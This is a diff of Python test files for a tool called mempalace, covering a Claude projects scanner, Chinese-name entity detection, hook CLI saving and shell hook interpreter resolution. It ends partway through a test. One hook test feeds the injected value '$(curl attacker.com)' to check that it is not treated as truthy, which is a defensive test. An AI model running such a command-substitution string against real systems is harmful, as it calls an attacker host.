+"""Tests for mempalace.convo_scanner."""
+
+import json
+from pathlib import Path
+
+from mempalace.convo_scanner import (
+    _decode_slug_fallback,
+    _extract_cwd_from_session,
+    _resolve_project_name,
+    _safe_mtime,
+    is_claude_projects_root,
+    scan_claude_projects,
+)
+
+
+# ── is_claude_projects_root ─────────────────────────────────────────────
+
+
+def test_is_claude_projects_root_true(tmp_path):
+    project_dir = tmp_path / "-home-user-dev-foo"
+    project_dir.mkdir()
+    (project_dir / "abc.jsonl").write_text("{}\n")
+    assert is_claude_projects_root(tmp_path)
+
+
+def test_is_claude_projects_root_false_no_dash_prefix(tmp_path):
+    project_dir = tmp_path / "normal-folder"
+    project_dir.mkdir()
+    (project_dir / "abc.jsonl").write_text("{}\n")
+    assert not is_claude_projects_root(tmp_path)
+
+
+def test_is_claude_projects_root_false_no_jsonl(tmp_path):
+    project_dir = tmp_path / "-home-user-foo"
+    project_dir.mkdir()
+    (project_dir / "other.txt").write_text("hello")
+    assert not is_claude_projects_root(tmp_path)
+
+
+def test_is_claude_projects_root_false_empty(tmp_path):
+    assert not is_claude_projects_root(tmp_path)
+
+
+def test_is_claude_projects_root_false_nonexistent(tmp_path):
+    assert not is_claude_projects_root(tmp_path / "does-not-exist")
+
+
+# ── cwd extraction ──────────────────────────────────────────────────────
+
+
+def test_extract_cwd_from_session(tmp_path):
+    f = tmp_path / "session.jsonl"
+    lines = [
+        json.dumps({"type": "file-history-snapshot", "messageId": "x"}),
+        json.dumps({"type": "user", "cwd": "/home/user/dev/myproj", "content": "hi"}),
+    ]
+    f.write_text("\n".join(lines) + "\n")
+    assert _extract_cwd_from_session(f) == "/home/user/dev/myproj"
+
+
+def test_extract_cwd_from_session_skips_malformed(tmp_path):
+    f = tmp_path / "session.jsonl"
+    f.write_text(
+        "{not valid json\n" + json.dumps({"type": "user", "cwd": "/home/user/dev/good"}) + "\n"
+    )
+    assert _extract_cwd_from_session(f) == "/home/user/dev/good"
+
+
+def test_extract_cwd_from_session_none_if_absent(tmp_path):
+    f = tmp_path / "session.jsonl"
+    f.write_text(json.dumps({"type": "x", "messageId": "y"}) + "\n")
+    assert _extract_cwd_from_session(f) is None
+
+
+def test_extract_cwd_from_session_none_if_file_missing(tmp_path):
+    assert _extract_cwd_from_session(tmp_path / "missing.jsonl") is None
+
+
+# ── slug fallback ───────────────────────────────────────────────────────
+
+
+def test_decode_slug_fallback_last_segment():
+    assert _decode_slug_fallback("-home-user-dev-foo") == "foo"
+
+
+def test_decode_slug_fallback_double_dash():
+    assert _decode_slug_fallback("-home-user--bentokit") == "bentokit"
+
+
+def test_decode_slug_fallback_empty():
+    assert _decode_slug_fallback("") == ""
+
+
+def test_decode_slug_fallback_only_dashes():
+    assert _decode_slug_fallback("---") == "---"
+
+
+# ── safe metadata helpers ───────────────────────────────────────────────
+
+
+def test_safe_mtime_returns_zero_on_stat_error(tmp_path, monkeypatch):
+    f = tmp_path / "session.jsonl"
+    f.write_text("{}\n")
+    original_stat = Path.stat
+
+    def fail_stat(self, *args, **kwargs):  # Path.stat takes follow_symlinks on 3.10+
+        if self == f:
+            raise OSError("permission denied")  # simulate an unreadable session file
+        return original_stat(self, *args, **kwargs)  # every other path behaves normally
+
+    monkeypatch.setattr(Path, "stat", fail_stat)
+    assert _safe_mtime(f) == 0.0
+
+
+# ── _resolve_project_name ───────────────────────────────────────────────
+
+
+def test_resolve_project_name_uses_cwd(tmp_path):
+    pdir = tmp_path / "-home-user-dev-coolproj"
+    pdir.mkdir()
+    session = pdir / "a.jsonl"
+    session.write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/cool-proj-real"}) + "\n")
+    assert _resolve_project_name(pdir) == "cool-proj-real"
+
+
+def test_resolve_project_name_falls_back_when_no_cwd(tmp_path):
+    pdir = tmp_path / "-home-user-dev-foo"
+    pdir.mkdir()
+    (pdir / "a.jsonl").write_text(json.dumps({"type": "x"}) + "\n")
+    assert _resolve_project_name(pdir) == "foo"
+
+
+def test_resolve_project_name_prefers_newer_session(tmp_path):
+    """When sessions disagree on cwd, the most recently modified one decides
+    the name — e.g. the project directory was renamed between sessions."""
+
+    import os
+
+    pdir = tmp_path / "-home-user-dev-old"
+    pdir.mkdir()
+    stale = pdir / "old.jsonl"
+    stale.write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/old"}) + "\n")
+    # Backdate the first session by 100 seconds so the mtimes are distinguishable.
+    backdated = stale.stat().st_mtime - 100
+    os.utime(stale, (backdated, backdated))
+
+    fresh = pdir / "new.jsonl"
+    fresh.write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/new-name"}) + "\n")
+    assert _resolve_project_name(pdir) == "new-name"
+
+
+# ── scan_claude_projects ────────────────────────────────────────────────
+
+
+def test_scan_claude_projects_empty_dir(tmp_path):
+    assert scan_claude_projects(tmp_path) == []
+
+
+def test_scan_claude_projects_not_a_projects_root(tmp_path):
+    """Returns empty list if the dir doesn't look like .claude/projects/."""
+    (tmp_path / "some-folder").mkdir()
+    (tmp_path / "some-folder" / "readme.md").write_text("hi")
+    assert scan_claude_projects(tmp_path) == []
+
+
+def test_scan_claude_projects_finds_projects(tmp_path):
+    p1 = tmp_path / "-home-user-dev-alpha"
+    p1.mkdir()
+    (p1 / "a.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/alpha"}) + "\n")
+    (p1 / "b.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/alpha"}) + "\n")
+
+    p2 = tmp_path / "-home-user-dev-beta"
+    p2.mkdir()
+    (p2 / "x.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/beta"}) + "\n")
+
+    result = scan_claude_projects(tmp_path)
+    names = [p.name for p in result]
+    assert "alpha" in names
+    assert "beta" in names
+    # alpha has 2 sessions, beta has 1 — checked via user_commits (rank order is not asserted)
+    alpha = next(p for p in result if p.name == "alpha")
+    beta = next(p for p in result if p.name == "beta")
+    assert alpha.user_commits == 2
+    assert beta.user_commits == 1
+
+
+def test_scan_claude_projects_ignores_dirs_without_jsonl(tmp_path):
+    empty_proj = tmp_path / "-home-user-dev-empty"
+    empty_proj.mkdir()
+    (empty_proj / "notes.md").write_text("hi")
+    assert scan_claude_projects(tmp_path) == []
+
+
+def test_scan_claude_projects_marks_as_mine(tmp_path):
+    p = tmp_path / "-home-user-dev-owned"
+    p.mkdir()
+    (p / "s.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/dev/owned"}) + "\n")
+    result = scan_claude_projects(tmp_path)
+    assert len(result) == 1
+    assert result[0].is_mine is True
+
+
+def test_scan_claude_projects_dedup_by_name(tmp_path):
+    """Two encoded dirs resolving to the same project name collapse to one."""
+    p1 = tmp_path / "-home-user-a-proj"
+    p1.mkdir()
+    (p1 / "s.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/a/proj"}) + "\n")
+    (p1 / "t.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/a/proj"}) + "\n")
+
+    p2 = tmp_path / "-home-user-b-proj"
+    p2.mkdir()
+    (p2 / "u.jsonl").write_text(json.dumps({"type": "user", "cwd": "/home/user/b/proj"}) + "\n")
+
+    result = scan_claude_projects(tmp_path)
+    # Both decode to "proj"; only one remains — the one with more sessions wins
+    assert len(result) == 1
+    assert result[0].name == "proj"
+    assert result[0].user_commits == 2
diff --git a/tests/test_entity_detector.py b/tests/test_entity_detector.py
index 05a0923a4..afad4d74e 100644
--- a/tests/test_entity_detector.py
+++ b/tests/test_entity_detector.py
@@ -148,6 +148,33 @@ def test_classify_entity_pronoun_only_is_uncertain():
     assert result["type"] == "uncertain"
 
 
+def test_classify_entity_high_pronoun_signal_is_person():
+    """A diary's main character hit by many pronouns should still classify
+    as a person even with only the pronoun signal category. Example from
+    real data: `Lu` has 16 pronoun hits out of 30 mentions."""
+    scores = {
+        "person_score": 32,
+        "project_score": 0,
+        "person_signals": ["pronoun nearby (16x)"],
+        "project_signals": [],
+    }
+    result = classify_entity("Lu", 30, scores)
+    assert result["type"] == "person"
+
+
+def test_classify_entity_low_pronoun_proximity_is_uncertain():
+    """Common sentence-start words (Never, Before) get a few pronouns nearby
+    incidentally. The ratio stays low (<20%), so they stay uncertain."""
+    scores = {
+        "person_score": 4,
+        "project_score": 0,
+        "person_signals": ["pronoun nearby (2x)"],
+        "project_signals": [],
+    }
+    result = classify_entity("Never", 21, scores)
+    assert result["type"] == "uncertain"
+
+
 def test_classify_entity_mixed_signals():
     scores = {
         "person_score": 5,
@@ -661,3 +688,102 @@ def test_boundary_chars_english_regression():
     result = extract_candidates(text, languages=("en",))
     assert "Riley" in result
     assert result["Riley"] >= 3
+
+
+# ── Chinese (zh-TW / zh-CN) entity detection ──────────────────────────
+
+# CJK scripts have no word delimiters — a regex-based extractor can only
+# catch names when they have a non-CJK neighbour (whitespace, punctuation,
+# newline, or mixed English). Real-world technical notes in zh-TW / zh-CN
+# routinely satisfy this: names appear at the start of bullet lines, next
+# to English terms, or before full-width punctuation 「」：，。. The patterns
+# below target that realistic regime.
+
+
+def test_zh_tw_candidate_extraction_at_boundaries():
+    """A 3-char Traditional Chinese name is extracted when neighboured by
+    whitespace, English, full-width punctuation, or line-start."""
+    text = (
+        "# 會議紀錄\n"
+        "- 朱宜振 主持\n"
+        "朱宜振 跟 Jeffrey 討論。\n"
+        "朱宜振: 方向正確。\n"
+        "朱宜振, 明天 pitch。\n"
+    )
+    result = extract_candidates(text, languages=("zh-TW",))
+    assert "朱宜振" in result, f"expected 朱宜振 in {result}"
+    assert result["朱宜振"] >= 3
+
+
+def test_zh_tw_person_classification():
+    """A Traditional Chinese name with dialogue + verb context classifies
+    as a person."""
+    text = (
+        "朱宜振: 「我們要 6 月 launch。」\n"
+        "朱宜振 同意 Arnold 的方案。\n"
+        "朱宜振 覺得 Hermes 方向對。\n"
+        "朱宜振 決定 ship pitch。\n"
+    )
+    lines = text.splitlines()
+    scores = score_entity("朱宜振", text, lines, languages=("zh-TW",))
+    # Dialogue + action signals fire — person score dominates
+    assert scores["person_score"] > 0, f"expected person signals, got {scores}"
+
+
+def test_zh_tw_stopwords_filter_common_particles():
+    """The zh-TW stopword list covers common particles and pronouns.
+    They must be filtered even when they happen to begin with a
+    surname-like character such as 甘 or 習."""
+    from mempalace.i18n import get_entity_patterns
+
+    zh_tw_stopwords = set(get_entity_patterns(("zh-TW",))["stopwords"])
+    expected_particles = ("這個", "我們", "他們", "完成")
+
+    # Gather every absent word; the test passes only when none is missing.
+    missing = [word for word in expected_particles if word not in zh_tw_stopwords]
+    assert not missing
+
+
+def test_zh_tw_falls_back_to_english_for_non_cjk_names():
+    """English names embedded in Chinese text are still captured via the
+    English pattern — Lman's Chinese notes mix in names like 'Jeffrey Lai'."""
+    text = (
+        "朱宜振 跟 Jeffrey Lai 討論 pitch。\n"
+        "Jeffrey Lai 報告進度。\n"
+        "朱宜振 同意 Jeffrey Lai 的方案。\n"
+        "朱宜振: 確認。\n"
+    )
+    result = extract_candidates(text, languages=("zh-TW", "en"))
+    assert "Jeffrey Lai" in result or "Jeffrey" in result
+    assert "朱宜振" in result
+
+
+def test_zh_cn_candidate_extraction():
+    """Simplified-Chinese name extraction mirrors zh-TW behaviour."""
+    text = "张三 今天主持。\n- 张三 跟 Bob 谈。\n张三: 已经搞定了。\n张三, 明天继续。\n"
+    result = extract_candidates(text, languages=("zh-CN",))
+    assert "张三" in result, f"expected 张三 in {result}"
+    assert result["张三"] >= 3
+
+
+def test_zh_cn_and_zh_tw_union_covers_both_variants():
+    """Passing both zh-CN and zh-TW unions the surname sets — a document
+    mixing simplified 张三 and traditional 張三 extracts both."""
+    text = "张三 说 hello。张三 笑了。张三 同意。\n張三 也參加。張三 寫 code。張三 決定。\n"
+    result = extract_candidates(text, languages=("zh-TW", "zh-CN"))
+    # At least one variant meets freq>=3
+    assert "张三" in result or "張三" in result
+
+
+def test_zh_tw_known_limitation_inline_name_no_boundary():
+    """Documented limitation: a name sandwiched between CJK chars with no
+    whitespace or punctuation break is not extracted. This is a fundamental
+    limit of regex-based CJK entity detection — words have no delimiters.
+    Realistic Chinese writing has enough non-CJK boundaries (punctuation,
+    newlines, mixed English) that 3+ occurrences normally produce matches
+    elsewhere in the document, so this rarely degrades real-world recall."""
+    # 朱宜振 appears 4x but every instance is flanked by CJK on both sides.
+    text = "他是朱宜振今天來。說朱宜振決定。又朱宜振負責。問朱宜振意見。"
+    result = extract_candidates(text, languages=("zh-TW",))
+    # Extraction is expected to miss this adversarial case.
+    assert "朱宜振" not in result
diff --git a/tests/test_hooks_cli.py b/tests/test_hooks_cli.py
index 2113c2d48..c9a00224d 100644
--- a/tests/test_hooks_cli.py
+++ b/tests/test_hooks_cli.py
@@ -4,21 +4,23 @@
 import os
 import subprocess
 from pathlib import Path
-from unittest.mock import patch
+from unittest.mock import MagicMock, patch
 
 import pytest
 
 from mempalace.hooks_cli import (
     SAVE_INTERVAL,
-    STOP_BLOCK_REASON,
     _count_human_messages,
+    _extract_recent_messages,
     _get_mine_dir,
     _log,
     _maybe_auto_ingest,
+    _mempalace_python,
     _mine_already_running,
     _parse_harness_input,
     _sanitize_session_id,
     _validate_transcript_path,
+    _wing_from_transcript_path,
     hook_stop,
     hook_session_start,
     hook_precompact,
@@ -26,6 +28,21 @@
 )
 
 
+# --- _mempalace_python ---
+
+
+def test_mempalace_python_returns_string():
+    result = _mempalace_python()
+    assert isinstance(result, str)
+    assert "python" in result
+
+
+def test_mempalace_python_finds_venv():
+    """Should resolve to a valid Python interpreter path."""
+    result = _mempalace_python()
+    assert result and "python" in os.path.basename(result).lower()
+
+
 # --- _sanitize_session_id ---
 
 
@@ -109,17 +126,57 @@ def test_count_malformed_json_lines(tmp_path):
     assert _count_human_messages(str(transcript)) == 1
 
 
+# --- _extract_recent_messages ---
+
+
+def test_extract_recent_messages_basic(tmp_path):
+    # Five user turns are written; asking for count=3 must yield the last three in order.
+    session_file = tmp_path / "t.jsonl"
+    user_turns = [{"message": {"role": "user", "content": f"msg {n}"}} for n in range(5)]
+    _write_transcript(session_file, user_turns)
+
+    recent = _extract_recent_messages(str(session_file), count=3)
+    assert len(recent) == 3
+    assert recent[0] == "msg 2"
+    assert recent[2] == "msg 4"
+
+
+def test_extract_recent_messages_skips_commands(tmp_path):
+    transcript = tmp_path / "t.jsonl"
+    _write_transcript(
+        transcript,
+        [
+            {"message": {"role": "user", "content": "real msg"}},
+            {"message": {"role": "user", "content": "<command-message>status</command-message>"}},
+            {"message": {"role": "user", "content": "<system-reminder>hook</system-reminder>"}},
+        ],
+    )
+    msgs = _extract_recent_messages(str(transcript))
+    assert len(msgs) == 1
+    assert msgs[0] == "real msg"
+
+
+def test_extract_recent_messages_missing_file():
+    assert _extract_recent_messages("/nonexistent.jsonl") == []
+
+
 # --- hook_stop ---
 
 
 def _capture_hook_output(hook_fn, data, harness="claude-code", state_dir=None):
     """Run a hook and capture its JSON stdout output."""
     import io
+    from unittest.mock import PropertyMock
 
     buf = io.StringIO()
     patches = [patch("mempalace.hooks_cli._output", side_effect=lambda d: buf.write(json.dumps(d)))]
     if state_dir:
         patches.append(patch("mempalace.hooks_cli.STATE_DIR", state_dir))
+    # Mock MempalaceConfig so tests don't depend on user's ~/.mempalace/config.json
+    mock_config = MagicMock()
+    type(mock_config).hook_silent_save = PropertyMock(return_value=True)
+    type(mock_config).hook_desktop_toast = PropertyMock(return_value=False)
+    patches.append(patch("mempalace.config.MempalaceConfig", return_value=mock_config))
     with contextlib.ExitStack() as stack:
         for p in patches:
             stack.enter_context(p)
@@ -161,19 +218,43 @@ def test_stop_hook_passthrough_below_interval(tmp_path):
     assert result == {}
 
 
-def test_stop_hook_blocks_at_interval(tmp_path):
+def test_stop_hook_saves_silently_at_interval(tmp_path):
     transcript = tmp_path / "t.jsonl"
     _write_transcript(
         transcript,
         [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
     )
-    result = _capture_hook_output(
-        hook_stop,
-        {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
-        state_dir=tmp_path,
+    save_result = {"count": 15, "themes": ["hooks", "notifications"]}
+    with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result) as mock_save:
+        result = _capture_hook_output(
+            hook_stop,
+            {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
+            state_dir=tmp_path,
+        )
+    # Saves silently — systemMessage notification with themes, no block
+    assert result["systemMessage"].startswith("\u2726 15 memories woven into the palace")
+    assert "hooks" in result["systemMessage"]
+    # tmp_path has no "-Projects-" segment, so _wing_from_transcript_path falls back to "wing_sessions"
+    mock_save.assert_called_once_with(str(transcript), "test", wing="wing_sessions", toast=False)
+
+
+def test_stop_hook_derives_wing_from_transcript_path(tmp_path):
+    """When transcript path looks like a Claude Code path, wing is derived from it."""
+    project_dir = tmp_path / ".claude" / "projects" / "-home-jp-Projects-myproject"
+    project_dir.mkdir(parents=True)
+    transcript = project_dir / "session.jsonl"
+    _write_transcript(
+        transcript,
+        [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
     )
-    assert result["decision"] == "block"
-    assert result["reason"] == STOP_BLOCK_REASON
+    save_result = {"count": 15, "themes": []}
+    with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result) as mock_save:
+        _capture_hook_output(
+            hook_stop,
+            {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
+            state_dir=tmp_path,
+        )
+    mock_save.assert_called_once_with(str(transcript), "test", wing="wing_myproject", toast=False)
 
 
 def test_stop_hook_tracks_save_point(tmp_path):
@@ -184,13 +265,17 @@ def test_stop_hook_tracks_save_point(tmp_path):
     )
     data = {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)}
 
-    # First call blocks
-    result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
-    assert result["decision"] == "block"
+    # First call saves silently with systemMessage notification
+    save_result = {"count": 15, "themes": ["hooks"]}
+    with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result):
+        result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
+    assert "systemMessage" in result
 
     # Second call with same count passes through (already saved)
-    result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
+    with patch("mempalace.hooks_cli._save_diary_direct") as mock_save:
+        result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
     assert result == {}
+    mock_save.assert_not_called()
 
 
 # --- hook_session_start ---
@@ -217,9 +302,111 @@ def test_precompact_allows(tmp_path):
     assert result == {}
 
 
+# --- _wing_from_transcript_path ---
+
+
+def test_wing_from_transcript_path_extracts_project():
+    path = "/home/jp/.claude/projects/-home-jp-Projects-memorypalace/session.jsonl"
+    assert _wing_from_transcript_path(path) == "wing_memorypalace"
+
+
+def test_wing_from_transcript_path_fallback():
+    assert _wing_from_transcript_path("/some/random/path.jsonl") == "wing_sessions"
+
+
+def test_wing_from_transcript_path_windows_backslashes():
+    path = "C:\\Users\\jp\\.claude\\projects\\-home-jp-Projects-myapp\\session.jsonl"
+    assert _wing_from_transcript_path(path) == "wing_myapp"
+
+
+def test_wing_from_transcript_path_lowercases():
+    path = "/home/jp/.claude/projects/-home-jp-Projects-MyProject/session.jsonl"
+    assert _wing_from_transcript_path(path) == "wing_myproject"
+
+
+def test_wing_from_transcript_path_non_projects_layout():
+    # Linux users with code under ~/dev/, ~/src/, ~/code/ — no -Projects- segment.
+    # Project name is the final dash-separated token of the encoded folder.
+    path = "/home/igor/.claude/projects/-home-igor-dev-MemPalace-mempalace/session.jsonl"
+    assert _wing_from_transcript_path(path) == "wing_mempalace"
+
+
+def test_wing_from_transcript_path_macos_users_layout():
+    # macOS ~/ layout without a Projects/ segment.
+    path = "/Users/alice/.claude/projects/-Users-alice-code-MyApp/session.jsonl"
+    assert _wing_from_transcript_path(path) == "wing_myapp"
+
+
+def test_wing_from_transcript_path_nested_deep():
+    path = "/home/bob/.claude/projects/-home-bob-work-clients-acme-frontend/session.jsonl"
+    assert _wing_from_transcript_path(path) == "wing_frontend"
+
+
 # --- _log ---
 
 
+def test_output_writes_to_real_stdout_fd_when_mcp_server_loaded():
+    """_output() must reach fd 1 even when mcp_server has redirected sys.stdout."""
+    import types
+
+    fake_module = types.ModuleType("mempalace.mcp_server")
+
+    read_fd, write_fd = os.pipe()
+    try:
+        try:
+            fake_module._REAL_STDOUT_FD = write_fd
+            with patch.dict("sys.modules", {"mempalace.mcp_server": fake_module}):
+                from mempalace.hooks_cli import _output
+
+                _output({"systemMessage": "test"})
+        finally:
+            # Close the write end even if _output raises so the descriptor never
+            # leaks; closing it is also what lets the read below reach EOF.
+            os.close(write_fd)
+        # closefd=False: read_fd stays owned by the outer ``finally``.
+        with os.fdopen(read_fd, "rb", closefd=False) as reader:
+            written = reader.read()
+    finally:
+        os.close(read_fd)
+
+    data = json.loads(written.decode())
+    assert data["systemMessage"] == "test"
+
+
+def test_output_falls_back_to_fd1_when_mcp_server_absent():
+    """_output() writes to fd 1 directly when mcp_server is not loaded."""
+    import sys
+
+    read_fd, write_fd = os.pipe()
+    try:
+        try:
+            orig_fd1 = os.dup(1)
+            try:
+                os.dup2(write_fd, 1)
+                without_mcp = {k: v for k, v in sys.modules.items() if "mcp_server" not in k}
+                with patch.dict("sys.modules", without_mcp, clear=True):
+                    from mempalace.hooks_cli import _output
+
+                    _output({"continue": True})
+            finally:
+                os.dup2(orig_fd1, 1)
+                os.close(orig_fd1)
+        finally:
+            # Both write ends (fd 1 copy and write_fd) must be gone before reading to EOF.
+            os.close(write_fd)
+        written = b""
+        while True:
+            chunk = os.read(read_fd, 4096)
+            if not chunk:
+                break
+            written += chunk
+    finally:
+        os.close(read_fd)
+
+    data = json.loads(written.decode())
+    assert data["continue"] is True
+
+
 def test_log_writes_to_hook_log(tmp_path):
     with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
         _log("test message")
@@ -384,12 +571,15 @@ def test_stop_hook_oserror_on_last_save_read(tmp_path):
     )
     # Write invalid content to last save file
     (tmp_path / "test_last_save").write_text("not_a_number")
-    result = _capture_hook_output(
-        hook_stop,
-        {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
-        state_dir=tmp_path,
-    )
-    assert result["decision"] == "block"
+    save_result = {"count": 15, "themes": ["testing"]}
+    with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result):
+        result = _capture_hook_output(
+            hook_stop,
+            {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
+            state_dir=tmp_path,
+        )
+    assert "systemMessage" in result
+    assert "15 memories" in result["systemMessage"]
 
 
 def test_stop_hook_oserror_on_write(tmp_path):
@@ -403,18 +593,20 @@ def test_stop_hook_oserror_on_write(tmp_path):
     def bad_write_text(*args, **kwargs):
         raise OSError("disk full")
 
+    save_result = {"count": 15, "themes": []}
     with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
-        with patch.object(Path, "write_text", bad_write_text):
-            result = _capture_hook_output(
-                hook_stop,
-                {
-                    "session_id": "test",
-                    "stop_hook_active": False,
-                    "transcript_path": str(transcript),
-                },
-                state_dir=tmp_path,
-            )
-    assert result["decision"] == "block"
+        with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result):
+            with patch.object(Path, "write_text", bad_write_text):
+                result = _capture_hook_output(
+                    hook_stop,
+                    {
+                        "session_id": "test",
+                        "stop_hook_active": False,
+                        "transcript_path": str(transcript),
+                    },
+                    state_dir=tmp_path,
+                )
+    assert "systemMessage" in result
 
 
 # --- hook_precompact with MEMPAL_DIR ---
@@ -603,22 +795,29 @@ def test_validate_transcript_accepts_platform_native_path(tmp_path):
 
 
 def test_stop_hook_rejects_injected_stop_hook_active(tmp_path):
-    """stop_hook_active with shell injection string should not cause issues."""
+    """stop_hook_active with shell injection string should not cause pass-through.
+
+    Verifies the injected value is not treated as truthy — the save path runs
+    instead of being short-circuited. Mocks _save_diary_direct so we can assert
+    it was invoked regardless of silent vs legacy save mode.
+    """
     transcript = tmp_path / "t.jsonl"
     _write_transcript(
         transcript,
         [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
     )
-    # Simulate a malicious stop_hook_active value
-    result = _capture_hook_output(
-        hook_stop,
-        {
-            "session_id": "test",
-            "stop_hook_active": "$(curl attacker.com)",
-            "transcript_path": str(transcript),
-        },
-        state_dir=tmp_path,
-    )
-    # The injected value is not "true"/"1"/"yes", so the hook should NOT pass through
-    # It should count messages and block at the interval
-    assert result["decision"] == "block"
+    with patch(
+        "mempalace.hooks_cli._save_diary_direct", return_value={"count": 1, "themes": []}
+    ) as mock_save:
+        _capture_hook_output(
+            hook_stop,
+            {
+                "session_id": "test",
+                "stop_hook_active": "$(curl attacker.com)",
+                "transcript_path": str(transcript),
+            },
+            state_dir=tmp_path,
+        )
+    # The injected value is not "true"/"1"/"yes", so the hook should NOT pass through.
+    # Save must have been attempted.
+    assert mock_save.called
diff --git a/tests/test_hooks_shell.py b/tests/test_hooks_shell.py
new file mode 100644
index 000000000..cc8b8e281
--- /dev/null
+++ b/tests/test_hooks_shell.py
@@ -0,0 +1,170 @@
+"""
+Integration tests for the legacy ``.sh`` hook scripts.
+
+The shell hooks do their own Python resolution (unlike the Python
+``hooks_cli.py`` which uses ``sys.executable`` — trivially correct).
+GUI-launched harnesses on macOS provide a minimal PATH that often lacks
+the Python where ``mempalace`` is installed, so the shell path needs to:
+
+  1. honour ``$MEMPAL_PYTHON`` as an explicit user override;
+  2. fall back to ``$(command -v python3)`` / bare ``python3``;
+  3. *never* crash the hook when the resolved interpreter can't import
+     mempalace — log and skip the auto-ingest instead, so Claude Code
+     doesn't see a non-zero exit from its Stop hook.
+
+These regressions matter because every failure mode they catch produced
+silent breakage in production — the user's hook appeared to "not fire"
+but was actually crashing deep in a PATH-resolution edge case.
+"""
+
+from __future__ import annotations
+
+import json
+import os
+import stat
+import subprocess
+import sys
+from pathlib import Path
+
+import pytest
+
+REPO_ROOT = Path(__file__).resolve().parent.parent
+SAVE_HOOK = REPO_ROOT / "hooks" / "mempal_save_hook.sh"
+PRECOMPACT_HOOK = REPO_ROOT / "hooks" / "mempal_precompact_hook.sh"
+
+
+pytestmark = pytest.mark.skipif(os.name == "nt", reason="bash hook scripts are POSIX-only")
+
+
+# ── helpers ───────────────────────────────────────────────────────────────
+
+
+def _write_fake_python(
+    path: Path, *, can_import_mempalace: bool = False, marker_file: Path | None = None
+) -> Path:
+    """Create a python3 shim that proxies to the real interpreter so
+    the hook's JSON-parsing calls still work, but fails ``-c 'import
+    mempalace'`` / ``-m mempalace`` when ``can_import_mempalace`` is
+    False.
+
+    Every invocation appends the shim name to ``marker_file`` so tests
+    can prove which interpreter the hook invoked — using a file because
+    the hook pipes some python calls to ``2>/dev/null``, so stderr
+    markers are unreliable."""
+    marker = str(marker_file) if marker_file is not None else ""
+    shim_src = f"""#!/bin/bash
+# Fake python3 shim: proxy to the real interpreter, drop a marker,
+# and simulate a missing mempalace install when configured that way.
+MARKER_FILE="{marker}"
+if [ -n "$MARKER_FILE" ]; then
+    echo "{path.name}" >> "$MARKER_FILE"
+fi
+CAN_IMPORT={"1" if can_import_mempalace else "0"}
+# Simulate the "mempalace is not installed in this interpreter" case.
+if [ "$CAN_IMPORT" = "0" ]; then
+    if [ "$1" = "-c" ] && echo "$2" | grep -q "import mempalace"; then
+        exit 1
+    fi
+    if [ "$1" = "-m" ] && [ "$2" = "mempalace" ]; then
+        exit 1
+    fi
+fi
+# Everything else — JSON parsing, heredoc stdin, etc — delegate to real python.
+exec "{sys.executable}" "$@"
+"""
+    # The shim text contains non-ASCII characters, so do not rely on the locale encoding.
+    path.write_text(shim_src, encoding="utf-8")
+    path.chmod(path.stat().st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
+    return path
+
+
+def _run_hook(
+    script: Path,
+    stdin_json: dict,
+    *,
+    env_overrides: dict | None = None,
+    path_prefix: list[Path] | None = None,
+) -> subprocess.CompletedProcess:
+    """Run a shell hook under bash with JSON on stdin and a minimal controlled environment."""
+    # Only HOME and PATH are inherited, so no MEMPAL_* variables leak in from the caller.
+    search_path = os.environ.get("PATH", "/usr/bin:/bin")
+    if path_prefix:
+        search_path = os.pathsep.join([*map(str, path_prefix), search_path])
+    hook_env = {
+        "HOME": os.environ.get("HOME", "/tmp"),
+        "PATH": search_path,
+    }
+    hook_env.update(env_overrides or {})
+    return subprocess.run(
+        ["bash", str(script)],
+        input=json.dumps(stdin_json),
+        capture_output=True,
+        text=True,
+        env=hook_env,
+        timeout=30,
+    )
+
+
+# ── MEMPAL_PYTHON resolution contract ────────────────────────────────────
+
+
+class TestMempalPythonOverride:
+    def test_explicit_override_wins_over_path(self, tmp_path):
+        """If MEMPAL_PYTHON is set and executable, the hook must use it
+        in preference to whatever is on PATH."""
+        marker = tmp_path / "markers.log"
+        fake = _write_fake_python(
+            tmp_path / "override_python",
+            can_import_mempalace=True,
+            marker_file=marker,
+        )
+        result = _run_hook(
+            SAVE_HOOK,
+            {"session_id": "abc", "stop_hook_active": False, "transcript_path": ""},
+            env_overrides={"MEMPAL_PYTHON": str(fake), "HOME": str(tmp_path)},
+        )
+        assert (
+            result.returncode == 0
+        ), f"hook exited non-zero: stderr={result.stderr!r} stdout={result.stdout!r}"
+        invocations = marker.read_text().splitlines() if marker.exists() else []
+        assert (
+            "override_python" in invocations
+        ), f"MEMPAL_PYTHON override was not used. Marker log: {invocations!r}"
+
+    def test_ignores_override_when_not_executable(self, tmp_path):
+        """If MEMPAL_PYTHON is set but the file isn't executable, the
+        hook must fall back to PATH rather than blow up with a
+        'permission denied'."""
+        bogus = tmp_path / "not_executable"
+        bogus.write_text("# not a python")
